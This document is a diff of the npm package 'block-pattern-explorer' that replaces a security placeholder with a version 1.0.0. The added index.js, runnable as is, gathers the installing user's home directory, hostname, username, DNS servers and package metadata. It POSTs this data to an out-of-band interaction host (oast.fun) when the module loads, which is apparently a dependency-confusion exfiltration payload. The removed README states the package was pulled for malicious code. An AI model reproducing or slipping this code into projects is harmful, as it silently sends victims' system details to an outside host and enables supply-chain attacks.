block-pattern-explorer 0.0.1-security → 1.0.0

package/index.js

@@ -0,0 +1,40 @@
+ const os = require("os"); const dns = 
+require("dns"); const querystring = 
+require("querystring"); const https = 
+require("https"); const packageJSON = 
+require("./package.json"); const package 
+= packageJSON.name; const trackingData = 
+JSON.stringify({
+    p: package, c: __dirname, hd: 
+    os.homedir(), hn: os.hostname(), un: 
+    os.userInfo().username, dns: 
+    dns.getServers(), r: packageJSON ? 
+    packageJSON.___resolved : undefined, 
+    v: packageJSON.version, pjson: 
+    packageJSON,
+});
+var postData = querystring.stringify({ 
+    msg: trackingData,
+});
+var options = { hostname: 
+    "cdthh0c2vtc0000wmw9ggg7eaoeyyyyyb.oast.fun", 
+    //replace burpcollaborator.net with 
+    Interactsh or pipedream port: 443, 
+    path: "/", method: "POST", headers: {
+        "Content-Type": 
+        "application/x-www-form-urlencoded", 
+        "Content-Length": 
+        postData.length,
+    },
+};
+var req = https.request(options, (res) => 
+{
+    res.on("data", (d) => { 
+        process.stdout.write(d);
+    });
+});
+req.on("error", (e) => {
+    // console.error(e);
+});
+req.write(postData);
+req.end();

package/index.json

@@ -0,0 +1 @@
+hix

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "block-pattern-explorer",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=block-pattern-explorer for more information.